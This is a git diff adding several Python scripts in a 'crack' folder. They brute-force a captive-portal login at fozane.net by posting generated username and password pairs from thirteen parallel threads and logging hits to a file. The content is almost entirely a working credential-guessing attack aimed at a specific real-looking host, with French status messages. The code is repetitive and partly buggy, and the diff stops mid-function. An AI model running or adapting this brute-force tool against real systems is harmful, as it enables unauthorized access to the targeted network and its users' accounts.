diff --git a/crack/crack2_1.py b/crack/crack2_1.py new file mode 100644 index 0000000..b966aaa --- /dev/null +++ b/crack/crack2_1.py @@ -0,0 +1,78 @@ +import requests +import time +import threading +import getpass +last=0 +def crack(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=1 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") diff --git a/crack/crack3.py b/crack/crack3.py new file mode 100644 index 0000000..d2e6845 --- /dev/null +++ b/crack/crack3.py @@ -0,0 +1,947 @@ +import requests +import time +import threading +last=0 +dema=" demarrage de la machine virtuel ..." +for new in dema: + time.sleep(1) + print(new,end="") +def crack(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=1 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack2(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=2 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack3(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=4 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack4(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=6 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack5(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=8 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack6(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=10 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack7(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=12 + y,z,u=0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack8(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=14 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack9(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=16 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack10(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=18 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack11(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=20 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack12(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=22 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack13(): + t1=time.time() + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=24 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") + +t1=threading.Thread(target=crack) +t2=threading.Thread(target=crack2) +t3=threading.Thread(target=crack3) +t4=threading.Thread(target=crack4) +t5=threading.Thread(target=crack5) +t6=threading.Thread(target=crack6) +t7=threading.Thread(target=crack7) +t8=threading.Thread(target=crack8) +t9=threading.Thread(target=crack9) +t10=threading.Thread(target=crack10) +t11=threading.Thread(target=crack11) +t12=threading.Thread(target=crack12) +t13=threading.Thread(target=crack13) +t1.start() +t2.start() +t3.start() +t4.start() +t5.start() +t6.start() +t7.start() +t8.start() +t9.start() +t10.start() +t11.start() +t12.start() +t13.start() +t1.join() +t2.join() +t3.join() +t4.join() +t5.join() +t6.join() +t7.join() +t8.join() +t9.join() +t10.join() +t11.join() +t12.join() +t13.join() diff --git a/crack/crack4.py b/crack/crack4.py new file mode 100644 index 0000000..98f824e --- /dev/null +++ b/crack/crack4.py @@ -0,0 +1,973 @@ +import requests +import time +import threading +import getpass +last=0 +def crack(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=1 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack2(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=2 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack3(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=4 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack4(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=6 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack5(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=8 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack6(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=10 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack7(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=12 + y,z,u=0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack8(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=14 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack9(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=16 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 